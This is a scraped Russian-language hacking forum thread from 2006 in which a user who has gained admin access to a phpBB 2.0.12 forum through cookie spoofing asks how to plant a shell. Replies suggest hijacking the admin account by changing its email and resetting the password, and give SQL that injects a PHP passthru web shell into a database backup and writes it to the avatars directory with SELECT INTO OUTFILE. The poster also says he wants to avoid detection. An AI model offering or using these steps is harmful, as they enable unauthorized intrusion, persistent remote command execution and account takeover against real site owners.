Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Способы заливки шелла в phpBB 2.0.12 |
10.06.2006, 23:43
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
Способы заливки шелла в phpBB 2.0.12
Получил права админа подменой кукисов, и че дальше сделать? База не сливается, не одна известная иньекция не помогает которые я пробывал, ни один сплойт с удаленными командами не работает. Люди скажите хотя бы как мне получить хеш админа? Или посоветуйте какой-нить сплойт? А может можно какими-то обходными путями залить шелл?
|
|
|
10.06.2006, 23:48
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Может, чуть-чуть подробнее ситуацию опишешь, какой форум... и т.д...
|
|
|
|
10.06.2006, 23:57
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
phpbb 2.0.12, че еще подробнее? Именно?
|
|
|
|
11.06.2006, 00:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
хы, если кукисы=пасс от админки в мд5, то еще что-то сделать можно. но похоже это не так, т.е тебе нужно достать настоящий пасс.. мде, почему то именно сейчас в голову пришла неплохая мысль..  берешь в профайле меняешь мыло админа на свое, и ретривишь пароль на то мыло, которое указал.. ы черт, чтож я раньше не допер  мыло админа только не забудь записать, чтоб обратно поменять.. жаль что пасс обратно нельзя будет поставить (например, если ипб, то с помощью бд хоть и сам хеш вставишь, а соль фигушки)..
__________________
ПИУ-ПИУ...
|
|
|
|
11.06.2006, 00:05
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
нет...погоди...так, а ты непробовал шелл залить или "сделать его"... ну типа в админке есть меню, я уж не помню, типа сохранить БД, вот сохраняешь её... открываешь блокнотом, или лучше Bredo'm и исчешь вот это:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
Если нашёл, то заменяешь вот на это...
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; А потом из этого же меню в админке востанавливаешь БД и указываешь путь к только, что исправленной БД.
Этот путь которой указан выше, от случая к случаю...
там будет осоздан обычный шелл...а там обращаешь с нему с просьбой выпонить тебе команду....вот и всё...
Последний раз редактировалось Dr.Check; 11.06.2006 в 00:08..
|
|
|
|
11.06.2006, 00:07
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
c411k А ты уверен что он мне его пасс вышлет? Я так уже думал, если он новый сгенерирует, то че делать? Впалюсь.
|
|
|
|
11.06.2006, 00:08
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
Dr.Check Я же написал что базу слить не могу....
|
|
|
|
11.06.2006, 00:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
Сообщение от DimaHbl4
c411k А ты уверен что он мне его пасс вышлет? Я так уже думал, если он новый сгенерирует, то че делать? Впалюсь.
ну так новый сгенерит и пох. зато будет админка. ты потом вбей какой нибудь default pass вбей, но мыло ему обратно смени, чтоб мог се восстановить. ну я ж писал что палево, зато работает ))
__________________
ПИУ-ПИУ...
|
|
|
|
11.06.2006, 00:14
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
c411k А мне палево не надо, тогда он везде пасс сменить, и шеллы начнет искать, и баста карапузики  Все нужно делать тихо..... |
|
|
|
11.06.2006, 00:14
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
и загрузить тоже не чего нельзя чтоль?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
